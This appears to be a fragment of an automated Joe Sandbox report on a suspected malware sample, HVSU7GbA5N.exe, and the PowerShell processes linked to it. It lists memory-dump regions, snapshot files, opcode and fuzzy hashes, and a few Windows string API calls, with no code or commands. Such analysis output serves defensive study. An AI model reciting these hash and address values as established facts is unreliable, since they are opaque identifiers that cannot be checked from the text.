• Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
Similarity
• API ID: Free$GlobalLibrary
• String ID: C:\Users\user\AppData\Local\Temp\
• API String ID: 1100898210-4083868402
• Opcode ID: c1f6b4989b579ccb4d1bab47613fbee0e7e5134bf480dcc377e5cd6992e46223
• Instruction ID: 1eddd4fff873b62aaaaf221bd6291171136980a6a9d1eb58fe3111f1a180586d
• Opcode Fuzzy Hash: c1f6b4989b579ccb4d1bab47613fbee0e7e5134bf480dcc377e5cd6992e46223
• Instruction Fuzzy Hash: 26E0C233811020ABC7216F56EC09B9ABB686F48B32F06442AED407B3B0D7746D418FD8
APIs
• lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402C95,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\HVSU7GbA5N.exe,C:\Users\user\Desktop\HVSU7GbA5N.exe,80000000,00000003), ref: 0040569A
• CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402C95,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\HVSU7GbA5N.exe,C:\Users\user\Desktop\HVSU7GbA5N.exe,80000000,00000003), ref: 004056A8
Strings
Memory Dump Source
• Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
Similarity
• API ID: CharPrevlstrlen
• String ID: C:\Users\user\Desktop
• API String ID: 2709904686-1876063424
• Opcode ID: c27a981e79bb352b20b7a8c74a9367836393bd04b8b6ccbc39cacac652a51138
• Instruction ID: 684961cdd3a6b9df4e479839de86435c839074591af8eb1459d6379f3a08a3e1
• Opcode Fuzzy Hash: c27a981e79bb352b20b7a8c74a9367836393bd04b8b6ccbc39cacac652a51138
• Instruction Fuzzy Hash: 04D0A772409D701EF30353108C04B8F7A88CF13300F490862E040E2191C37C1C818BBE
APIs
• lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004059E2,00000000,[Rename],00000000,00000000,00000000), ref: 004057C3
• lstrcmpiA.KERNEL32(004059E2,00000000), ref: 004057DB
• CharNextA.USER32(004059E2,?,00000000,004059E2,00000000,[Rename],00000000,00000000,00000000), ref: 004057EC
• lstrlenA.KERNEL32(004059E2,?,00000000,004059E2,00000000,[Rename],00000000,00000000,00000000), ref: 004057F5
Memory Dump Source
• Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
Similarity
• API ID: lstrlen$CharNextlstrcmpi
• String ID:
• API String ID: 190613189-0
• Opcode ID: 69516db92ab03ac2bd29524685631cd9f8e4e2de886f88dc1d7fd11a4109c375
• Instruction ID: ad6d9dedd63ee89ffd4e190405b35f06ce6ae84d6c36acf6f04f4a95cd08f7cb
• Opcode Fuzzy Hash: 69516db92ab03ac2bd29524685631cd9f8e4e2de886f88dc1d7fd11a4109c375
• Instruction Fuzzy Hash: 66F0C232604558FFCB12DBA4DD4099EBBA8EF06350B2140B9F800F7210D274EE01ABA9
Memory Dump Source
• Source File: 00000002.00000002.2023843153.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7d20000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 87e2f1c21903894c07d2fe8e79fac97c636b48b4855c25d8fd71adc3240cecb9
• Instruction ID: a4b749810909adf46a5e3a115cf6197f2398c48e855bc81fe749b19f81584348
• Opcode Fuzzy Hash: 87e2f1c21903894c07d2fe8e79fac97c636b48b4855c25d8fd71adc3240cecb9
• Instruction Fuzzy Hash: AC0370B4A00325DFE724DB64C850B9AF7B2AF85704F1085A9D809BB745DB72ED82CF61
Memory Dump Source
• Source File: 00000002.00000002.2011445193.0000000004DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_4dc0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6dccff6f6bdf00a2fdc8e9176ef0a4ace44ab216eb88f26c91a0312bae66ed00
• Instruction ID: 4c771c9215f28c3033f3e5f3b6c721abdbdcc6e62458b75ec5841124adcd39ca
• Opcode Fuzzy Hash: 6dccff6f6bdf00a2fdc8e9176ef0a4ace44ab216eb88f26c91a0312bae66ed00
                                                                                                                                            • Instruction Fuzzy Hash: 68415B35B002069FDB19EB34C858AAD7BF2AF89754F08446CE406EB7A0DB34AD45CB90
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.2032543720.0000000009A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09A90000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_9a90000_powershell.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: _
                                                                                                                                            • API String ID: 0-701932520
                                                                                                                                            • Opcode ID: 2be83af537a28de0b27eb29f3f01cae92b0f6bdb94515e0ebfff8ec746383015
                                                                                                                                            • Instruction ID: 1db8fb547c715d1a9c7e347c484f0eb591e07bf7e69d99eaa8360cc3734f73cf
                                                                                                                                            • Opcode Fuzzy Hash: 2be83af537a28de0b27eb29f3f01cae92b0f6bdb94515e0ebfff8ec746383015
                                                                                                                                            • Instruction Fuzzy Hash: 2692BF74B10205AFDB14DB68C840BAAB7F6FF85B14F14806AE815AF751DB72EC41CBA1
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.2023843153.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_7d20000_powershell.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: kDO
                                                                                                                                            • API String ID: 0-2207574971
                                                                                                                                            • Opcode ID: 8af82e2915e430c82b7df46cd2584fb6db56b96b976f17db703a6827788f6f4b
                                                                                                                                            • Instruction ID: 6c12c098d4314c8e38442038058629bf1ae1d3f7d4d097e083ced9c71ad026ee
                                                                                                                                            • Opcode Fuzzy Hash: 8af82e2915e430c82b7df46cd2584fb6db56b96b976f17db703a6827788f6f4b
                                                                                                                                            • Instruction Fuzzy Hash: 8C215BF2B002218BD715A3685C11FAAF352AFD531CB11846BEA01AF740EE72DD4383E2
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.2023843153.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_7d20000_powershell.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: c0b0350a4a7f62a8da4b743ffaea0d2aacba4c27be1b4a8c5609ad405d218bff
                                                                                                                                            • Instruction ID: 91c2990e10184f4f7bde105ed94d06c1c913bfbff4b09be9628bc2bff807b712
                                                                                                                                            • Opcode Fuzzy Hash: c0b0350a4a7f62a8da4b743ffaea0d2aacba4c27be1b4a8c5609ad405d218bff
                                                                                                                                            • Instruction Fuzzy Hash: B1C2B1B4A10315DFE724DB64C850BAEB7B2AF89704F1085A9D8097B744DB72ED82CF61
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.2023843153.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_7d20000_powershell.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 049105b669a103b4a4e688d1756fef0833611fd1d1d9fb0dfdc37f85db66a260
                                                                                                                                            • Instruction ID: f4f30029d1eafbf39a53c5ed7502d898800a6b145f52158f995286b8b364a486
                                                                                                                                            • Opcode Fuzzy Hash: 049105b669a103b4a4e688d1756fef0833611fd1d1d9fb0dfdc37f85db66a260
                                                                                                                                            • Instruction Fuzzy Hash: B2A293B4A00325DFDB24DB54C850BAAF7B2AF85304F1484AAD54A6BB41DB71ED83CF61
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.2023843153.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_7d20000_powershell.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 68e7d8b52599d6a180071e5321fad615bbc3d4f7a4dbfc48f6e23a412d25dab4
                                                                                                                                            • Instruction ID: aa4f18282ba2d0cba9b35d1b48d0382bd5111bc738612d09ee9d1fc774048e63
                                                                                                                                            • Opcode Fuzzy Hash: 68e7d8b52599d6a180071e5321fad615bbc3d4f7a4dbfc48f6e23a412d25dab4
                                                                                                                                            • Instruction Fuzzy Hash: FE827FB4A00725DFD724DB54C950BAAB7B2AF85304F10C4AAD94A6BB40DB71ED83CF61
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.2023843153.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_7d20000_powershell.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 47240bb3561dd8a8b2792b6378ec95889977a934d6454b1706fbea654b8f3ba5
                                                                                                                                            • Instruction ID: 89b2e4e961c92df7d3175b2a803e8bd1f5f88fc0576151dd9f62008cd3ae7f7c
                                                                                                                                            • Opcode Fuzzy Hash: 47240bb3561dd8a8b2792b6378ec95889977a934d6454b1706fbea654b8f3ba5
                                                                                                                                            • Instruction Fuzzy Hash: C7726BB4A00325DFDB24DB54C950BAAF7B2AF85304F14C49AD94A6BB44DB31ED82CF61
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.2023843153.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_7d20000_powershell.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 62f2c25992cd80aaf550704aa5a01de65318cacb5f1e5ce44b25cc7b2acaf2ef
                                                                                                                                            • Instruction ID: f59a9f709201d99aed058236f71631a3fa6246bfd5dded3b34499ac28ced7123
                                                                                                                                            • Opcode Fuzzy Hash: 62f2c25992cd80aaf550704aa5a01de65318cacb5f1e5ce44b25cc7b2acaf2ef
                                                                                                                                            • Instruction Fuzzy Hash: DF726BB4A00325DFDB24DB54C950BAAF7B2AF85304F14C49AD90A6BB44DB71ED82CF61
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.2023843153.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_7d20000_powershell.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 35ef9dce3694d287e49b97fb0bca7857a99f00e1443a566cce68c79a26da72a0
                                                                                                                                            • Instruction ID: ecada395f08a98cda9b813f4963ea65b5e4184a074299f541c10c51e541c036f
                                                                                                                                            • Opcode Fuzzy Hash: 35ef9dce3694d287e49b97fb0bca7857a99f00e1443a566cce68c79a26da72a0
                                                                                                                                            • Instruction Fuzzy Hash: 545281B4A00725DFEB24DB54C950B9AF7B2AF85304F10C49AD94A6BB40DB71ED82CF61
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.2023843153.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_7d20000_powershell.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 627eaa015b0e9ece608a91093d424372949327a27595a5d3ec4ec202bb815920
                                                                                                                                            • Instruction ID: 422c14970b397a88e28a666d15d0c266992b8345773a1aab71f2fae3338d6e69
                                                                                                                                            • Opcode Fuzzy Hash: 627eaa015b0e9ece608a91093d424372949327a27595a5d3ec4ec202bb815920
                                                                                                                                            • Instruction Fuzzy Hash: C742B4B4B00315DFE724DB94C850B9AB7B2AF85304F1085A9D80A6F745DB72ED82CF61
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.2023843153.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_7d20000_powershell.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: abb5d27cf0bfa9c1d1339e91b71aa971412ab42564a91449b48b32e2a9755302
                                                                                                                                            • Instruction ID: 3ec89950c5111df5b6c87118ee3e18a6055e315af1a915e0336cced98147e265
                                                                                                                                            • Opcode Fuzzy Hash: abb5d27cf0bfa9c1d1339e91b71aa971412ab42564a91449b48b32e2a9755302
                                                                                                                                            • Instruction Fuzzy Hash: 18227CB4B00214EFD714DB98D540F9AB7B2EF88709F148069E905AF791DB72EC82DB91
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.2032543720.0000000009A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09A90000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_9a90000_powershell.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 090c6077753a60c5880c8e443f5cbb340fc6b6d9b7c5a51c159319e8b7b732d7
                                                                                                                                            • Instruction ID: c994ef4df743cfd650e5544c54599b2743e19ff8830db350829bec8182d4dd27
                                                                                                                                            • Opcode Fuzzy Hash: 090c6077753a60c5880c8e443f5cbb340fc6b6d9b7c5a51c159319e8b7b732d7
                                                                                                                                            • Instruction Fuzzy Hash: 7302E171B14206CFDB14DBA8C440BAAB7F6FF89B14F15806AE805AB751DB35DC41CBA1
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.2023843153.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_7d20000_powershell.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 4ba87922362738417e8b6f4f7e14f2968780b11af6c162a11d7f10c9362ecc0a
                                                                                                                                            • Instruction ID: 405c63bee0d71e1472e70b70f7a09a7dada2eee3af282b211d6f75f5ace2711e
• Opcode Fuzzy Hash: 4ba87922362738417e8b6f4f7e14f2968780b11af6c162a11d7f10c9362ecc0a
• Instruction Fuzzy Hash: A7123DB0A04226DFEB20DB14C950BA9F7B2AF55308F1084E9D949BB740DB71ED82DF61

Memory Dump Source
• Source File: 00000002.00000002.2023843153.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7d20000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: acece4fca93645cfb67d2cabe7fd16ea6824a9d39643841775da08047c87e0ea
• Instruction ID: 7caebd3416c22d8f47c2414bfac14188ad31900104fcd4bc126ecc3140ad69a8
• Opcode Fuzzy Hash: acece4fca93645cfb67d2cabe7fd16ea6824a9d39643841775da08047c87e0ea
• Instruction Fuzzy Hash: FC122CB4B00226DFEB24DB14C950BA9F7B2AB55308F1084E9D949BB740DB71ED82DF61

Memory Dump Source
• Source File: 00000002.00000002.2032521127.0000000009A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 09A80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_9a80000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a2e5bec813482c4b8a9b6d7b63761c5b1a29f9e0feca775c3505f2e009b54266
• Instruction ID: 7b38b8b34da5797395dc6bfeb2392b0cc1e78636e8e630fee15cb76ff3417dc5
• Opcode Fuzzy Hash: a2e5bec813482c4b8a9b6d7b63761c5b1a29f9e0feca775c3505f2e009b54266
• Instruction Fuzzy Hash: 06024974A012099FDB05DF98C884BAEBBF6FF88750F248159E815AB365C735ED81CB90

Memory Dump Source
• Source File: 00000002.00000002.2032521127.0000000009A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 09A80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_9a80000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5e24b92434d698ae15a8fdffd392718fa0aeedf24b6665235d124ab33afc1020
• Instruction ID: 7c0189804d7cea6ec69b62911d15840ec4abda6c55273dc40c6ce9814f8846f5
• Opcode Fuzzy Hash: 5e24b92434d698ae15a8fdffd392718fa0aeedf24b6665235d124ab33afc1020
• Instruction Fuzzy Hash: 8D023C74A00209DFDB05DF98D884AAEBBF6FF88750F258169E815AB365C731ED41CB90

Memory Dump Source
• Source File: 00000002.00000002.2023843153.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7d20000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8084dbbae480942a0c45fc2fb5c2ae64492197b8b10a2b5b8d429c82ac504fdd
• Instruction ID: d9e44b4e8746de74b3e5dbd91f47958a88d69d2fea6fddeb5e92e8e44cd82683
• Opcode Fuzzy Hash: 8084dbbae480942a0c45fc2fb5c2ae64492197b8b10a2b5b8d429c82ac504fdd
• Instruction Fuzzy Hash: 3DF16BB4A00254EFDB14CB58C540F9ABBB2FF88709F158059E905AF791DB72EC82DB51

Memory Dump Source
• Source File: 00000002.00000002.2032521127.0000000009A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 09A80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_9a80000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8dfb48ca69b130e96187ca6247cf17af1c42695701cfcc4bfc66564c409170bc
• Instruction ID: a2c85ac0fd3bdc3b42c5fd7562f407ff4d15ea7ee3ee419c946cde56d1134e9a
• Opcode Fuzzy Hash: 8dfb48ca69b130e96187ca6247cf17af1c42695701cfcc4bfc66564c409170bc
• Instruction Fuzzy Hash: 95F18E71A01258DFDB05DFA8C894ADEBBB2FF89710F158199E804AB361C735ED85CB90

Memory Dump Source
• Source File: 00000002.00000002.2023843153.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7d20000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 927f5993c722d5d63fdef25aff49d35ab3dd4175b276d8bbeb8b4421f0338e0a
• Instruction ID: 6d4755add6d13e9ae659496f42eb2f0b157c04b1672103357e884530bdeb026a
• Opcode Fuzzy Hash: 927f5993c722d5d63fdef25aff49d35ab3dd4175b276d8bbeb8b4421f0338e0a
• Instruction Fuzzy Hash: 51E19AB0B002559FDB54DB98C440BAAB7B2EF89708F15C069E805AF751DB72EC43CB91

Memory Dump Source
• Source File: 00000002.00000002.2023843153.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7d20000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ff35d61e4cb8140a23f81cb75336ae4fa22d4879dd25c58d167beda81e5da04a
• Instruction ID: 8df1c69aa6b610f4052b59a76854335eafd314ff25ec560f5a0292bc967183b1
• Opcode Fuzzy Hash: ff35d61e4cb8140a23f81cb75336ae4fa22d4879dd25c58d167beda81e5da04a
• Instruction Fuzzy Hash: 2AD168B0A012959FDB14CB58C540FAAFBB2EF94718F158059E815AF751CB72EC83CB91

Memory Dump Source
• Source File: 00000002.00000002.2011445193.0000000004DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_4dc0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 39a30a6c871374b10215b047db63b6caaa350a07d8f604794c03b9869e522020
• Instruction ID: 5bafad14ecebeb263bb1b3adfd5ddb991833382e4a44ac62d01032388233850d
• Opcode Fuzzy Hash: 39a30a6c871374b10215b047db63b6caaa350a07d8f604794c03b9869e522020
• Instruction Fuzzy Hash: 2EC17B35A0030ADFCB14DFA5D948AADBBB2FF84710F158569E406AB364DB34AD49CF80

Memory Dump Source
• Source File: 00000002.00000002.2032521127.0000000009A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 09A80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_9a80000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7353442caadd232c963779a5e54a9899d0490296128f5309ba2f279553314d56
• Instruction ID: ec7943b2338404e747b9d4826c7d295a658ee25e76669e435df5ed22a4111ff8
• Opcode Fuzzy Hash: 7353442caadd232c963779a5e54a9899d0490296128f5309ba2f279553314d56
• Instruction Fuzzy Hash: 1391E831A093958FD706DB78C8606DE7FB1AF86610B1940DBC441DF263DB388D0ACBA6

Memory Dump Source
• Source File: 00000002.00000002.2032521127.0000000009A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 09A80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_9a80000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b454990c94f02c85133a6a3c312a819875cdfd896e83f15177e154aa3925f4ee
• Instruction ID: 52463ca7da813585c89a705c47eaa34af4b392f4dedaf21ac9e65f20727942af
• Opcode Fuzzy Hash: b454990c94f02c85133a6a3c312a819875cdfd896e83f15177e154aa3925f4ee
• Instruction Fuzzy Hash: FD819D35B002198FDB15EFA9C880AAFB7B6FFC8710F148569E8059B355DB349C46CBA1

Memory Dump Source
• Source File: 00000002.00000002.2011445193.0000000004DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_4dc0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 57986c9b6df84fdcbd4c031f466d95703f9a581cf4d43c7135f36b0526d8f26d
• Instruction ID: ef9e67f2298b6969acb7a56f687de2833df9850abecb779be93947eaaa7ad2b2
• Opcode Fuzzy Hash: 57986c9b6df84fdcbd4c031f466d95703f9a581cf4d43c7135f36b0526d8f26d
• Instruction Fuzzy Hash: 78917F74A0024A8FCB15CF58C594AAEFBB2FF89310B248599D815AB3A5C735FC51CBA0

Memory Dump Source
• Source File: 00000002.00000002.2032543720.0000000009A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09A90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_9a90000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 85c0578668cc9134c3f158d203bfddd68f0650d9061a0896a5fcb622381dbb51
• Instruction ID: c121edc6622ea88ac60bb0ff639485664eda695bcb9afd610764df92ed87c0c9
• Opcode Fuzzy Hash: 85c0578668cc9134c3f158d203bfddd68f0650d9061a0896a5fcb622381dbb51
• Instruction Fuzzy Hash: D1814874A14205DFDB14CF88C584EAAB7F2BF88714F19C059E905AB755CB36E881CFA0

Memory Dump Source
• Source File: 00000002.00000002.2011445193.0000000004DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_4dc0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 41aee4a8acd99ac7b82de66c93269c66b35f8a245eecaf89c3e36e78317b83fa
• Instruction ID: 70610b8edcece1ed2b00e008afffeb536632851425c5d138121b5e09eeefffed
• Opcode Fuzzy Hash: 41aee4a8acd99ac7b82de66c93269c66b35f8a245eecaf89c3e36e78317b83fa
• Instruction Fuzzy Hash: 33718A31A0020ADFDB14DF68C884A9EBBF6FF89354F14856ED415AB651DB70AC46CF90

Memory Dump Source
• Source File: 00000002.00000002.2011445193.0000000004DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_4dc0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 60915a1f5b1e44c7eccbc099b460acf65aec87405893a905258b802fc8b284c2
• Instruction ID: 4e044bd515ef31c41499e4ffbb0fdc8316e2cfa69a38471d58989a971ad528e8
• Opcode Fuzzy Hash: 60915a1f5b1e44c7eccbc099b460acf65aec87405893a905258b802fc8b284c2
• Instruction Fuzzy Hash: 1A713A30A0020ADFDB19DFA5D884AADBBF2BF88344F14842DD412AB764DB74AD46CF50

Memory Dump Source
• Source File: 00000002.00000002.2011445193.0000000004DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_4dc0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: fd067570ce6ddc3579154f075aeab8d675b19b2da40d583862b3ab6d3ee70e7b
• Instruction ID: 0feb082d303206b428f6c29b24883f7726924fdaa8b1c0a75ca19ea691f10c39
• Opcode Fuzzy Hash: fd067570ce6ddc3579154f075aeab8d675b19b2da40d583862b3ab6d3ee70e7b
• Instruction Fuzzy Hash: 58518134A013448FDB05DF79C8547AEBBF6AFCA210F19846AD846AF396CF349C458B64

Memory Dump Source
• Source File: 00000002.00000002.2032521127.0000000009A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 09A80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_9a80000_powershell.jbxd
Similarity
• API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 127cbe24f5a8abd17fb9765ded67577b260fc3c4a95eb49c048fab51f78e8b90
                                                                                                                                            • Instruction ID: daab3e5a1aaf69186932b03236bbd8d6e0491930fc14fe5b6d10e5edc9b7abaf
                                                                                                                                            • Opcode Fuzzy Hash: 127cbe24f5a8abd17fb9765ded67577b260fc3c4a95eb49c048fab51f78e8b90
                                                                                                                                            • Instruction Fuzzy Hash: 0C41616291E3E05FE703AB389CB06D53F70AE87518B1A01C7C091CF1A3E619995DC7AB
